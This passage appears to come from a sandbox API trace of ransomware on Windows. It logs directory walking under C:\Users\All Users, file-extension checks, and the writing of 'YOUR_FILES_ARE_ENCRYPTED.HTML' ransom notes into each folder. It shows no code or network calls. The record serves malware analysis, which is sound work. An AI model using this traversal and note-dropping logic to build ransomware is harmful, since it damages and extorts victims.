Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.579] GetProcessHeap () returned 0x600000 [0110.579] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.580] GetProcessHeap () returned 0x600000 [0110.580] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.580] GetProcessHeap () returned 0x600000 [0110.580] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.581] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0110.581] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.581] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0110.581] GetProcessHeap () returned 0x600000 [0110.581] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.582] GetProcessHeap () returned 0x600000 [0110.582] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.582] GetProcessHeap () returned 0x600000 [0110.582] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.582] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6121cfc7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0110.582] StrStrIW (lpFirst="regid.1991-06.com.microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.582] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned 50 [0110.582] GetProcessHeap () returned 0x600000 [0110.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.583] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft" [0110.583] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*") returned="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*" [0110.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb06ebc51, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.592] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb06ebc51, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0110.592] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x556e33d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", cAlternateFileName="REGID1~2.SWI")) returned 1 [0110.593] StrStrIW (lpFirst="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.593] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned 133 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0110.593] lstrlenW (lpString=".swidtag") returned 8 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0110.593] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c6200, ftCreationTime.dwHighDateTime=0x1d0d7d0, ftLastAccessTime.dwLowDateTime=0x6fc19112, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x58c6200, ftLastWriteTime.dwHighDateTime=0x1d0d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1 [0110.593] StrStrIW (lpFirst="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.593] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned 129 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0110.593] lstrlenW (lpString=".swidtag") returned 8 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0110.593] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 1 [0110.593] StrStrIW (lpFirst="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.593] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned 132 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0110.593] lstrlenW (lpString=".swidtag") returned 8 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0110.593] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 1 [0110.593] StrStrIW (lpFirst="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.593] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned 101 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned=".swidtag" [0110.593] lstrlenW (lpString=".swidtag") returned 8 [0110.593] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned=".swidtag" [0110.593] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb06ebc51, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb06ebc51, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06ef857, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.593] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb06ebc51, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb06ebc51, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06ef857, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.593] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.593] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0110.593] GetProcessHeap () returned 0x600000 [0110.594] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.594] GetProcessHeap () returned 0x600000 [0110.594] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.594] GetProcessHeap () returned 0x600000 [0110.594] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.595] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0110.595] StrStrIW (lpFirst="SoftwareDistribution", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.595] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution") returned 43 [0110.595] GetProcessHeap () returned 0x600000 [0110.595] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.596] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution" | out: lpString1="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution") returned="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution" [0110.596] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\*") returned="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\*" [0110.596] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xb07030b1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xb07030b1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0110.598] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 1 [0110.598] StrStrIW (lpFirst="PostRebootEventCache.V2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.598] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2") returned 67 [0110.598] GetProcessHeap () returned 0x600000 [0110.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.599] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2" | out: lpString1="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2") returned="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2" [0110.599] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*") returned="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*" [0110.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xb06fba8a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c348, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.599] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xb06fba8a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c348, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.599] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb06fa6cd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb06fa6cd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06ff500, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c348, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.599] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb06fa6cd, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb06fa6cd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06ff500, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c348, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.599] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.600] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.600] GetProcessHeap () returned 0x600000 [0110.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.600] GetProcessHeap () returned 0x600000 [0110.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.600] GetProcessHeap () returned 0x600000 [0110.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07030b1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb07030b1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0707da1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.601] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07030b1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb07030b1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0707da1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.601] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.601] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0110.601] GetProcessHeap () returned 0x600000 [0110.601] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\SoftwareDistribution\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\softwaredistribution\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.602] GetProcessHeap () returned 0x600000 [0110.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.602] GetProcessHeap () returned 0x600000 [0110.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.602] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0110.602] StrStrIW (lpFirst="Start Menu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.602] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Start Menu") returned 33 [0110.602] GetProcessHeap () returned 0x600000 [0110.602] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.603] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu") returned="\\\\?\\C:\\Users\\All Users\\Start Menu" [0110.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu\\*") returned="\\\\?\\C:\\Users\\All Users\\Start Menu\\*" [0110.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07030b1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb07030b1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0707da1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="翿")) returned 0xffffffff [0110.604] GetProcessHeap () returned 0x600000 [0110.604] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.604] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0110.604] StrStrIW (lpFirst="Templates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.604] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: 